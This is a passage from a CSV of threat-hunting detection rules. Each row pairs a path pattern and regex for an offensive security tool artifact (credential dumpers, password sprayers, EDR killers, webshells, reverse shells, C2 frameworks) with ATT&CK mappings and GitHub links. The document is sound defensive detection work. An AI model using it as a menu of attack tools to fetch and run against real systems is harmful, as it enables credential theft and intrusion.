- T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSecDump.exe*",".{0,1000}\/SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSecDump.git*",".{0,1000}\/SharpSecDump\.git.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpShares.git*",".{0,1000}\/SharpShares\.git.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*/SharpShares/Enums*",".{0,1000}\/SharpShares\/Enums.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*/SharpShares-master*",".{0,1000}\/SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*/SharpShellPipe.git*",".{0,1000}\/SharpShellPipe\.git.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*/Sharp-SMBExec.exe*",".{0,1000}\/Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSniper.exe*",".{0,1000}\/SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSocks*",".{0,1000}\/SharpSocks.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*/SharpSphere.exe*",".{0,1000}\/SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSploit*",".{0,1000}\/SharpSploit.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpSploit.dll*",".{0,1000}\/SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*/SharpSploit.git*",".{0,1000}\/SharpSploit\.git.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - 
TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/SharpSploit/*",".{0,1000}\/SharpSploit\/.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*/SharpSploitConsole.git*",".{0,1000}\/SharpSploitConsole\.git.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*/SharpSpoolTrigger*",".{0,1000}\/SharpSpoolTrigger.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*/sharpspray.exe*",".{0,1000}\/sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*/SharpSpray.git*",".{0,1000}\/SharpSpray\.git.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*/SharpSpray-1.1.zip*",".{0,1000}\/SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*/SharpSQLPwn.exe*",".{0,1000}\/SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpStay.git*",".{0,1000}\/SharpStay\.git.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*/SharpStay/*",".{0,1000}\/SharpStay\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*/SharpSvc.exe*",".{0,1000}\/SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSword.git*",".{0,1000}\/SharpSword\.git.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*/SharpSword/SharpSword*",".{0,1000}\/SharpSword\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*/SharpSystemTriggers*",".{0,1000}\/SharpSystemTriggers.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpTerminator/*",".{0,1000}\/SharpTerminator\/.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" 
"*/SharpTokenFinder.exe*",".{0,1000}\/SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpUnhooker.git*",".{0,1000}\/SharpUnhooker\.git.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpUp.git*",".{0,1000}\/SharpUp\.git.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpView.git*",".{0,1000}\/SharpView\.git.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*/SharpWebServer.exe*",".{0,1000}\/SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpWMI.exe*",".{0,1000}\/SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpWSUS*",".{0,1000}\/SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*/SharPyShell*",".{0,1000}\/SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - 
T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/shell/password.go*",".{0,1000}\/shell\/password\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/shell/shell_port.*",".{0,1000}\/shell\/shell_port\..{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/shell?k=*&ip=*&cmd=*",".{0,1000}\/shell\?k\=.{0,1000}\&ip\=.{0,1000}\&cmd\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/shell_exec.py*",".{0,1000}\/shell_exec\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Shell3er.git*",".{0,1000}\/Shell3er\.git.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*/Shell3er.ps1*",".{0,1000}\/Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*/Shell3er/*",".{0,1000}\/Shell3er\/.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell 
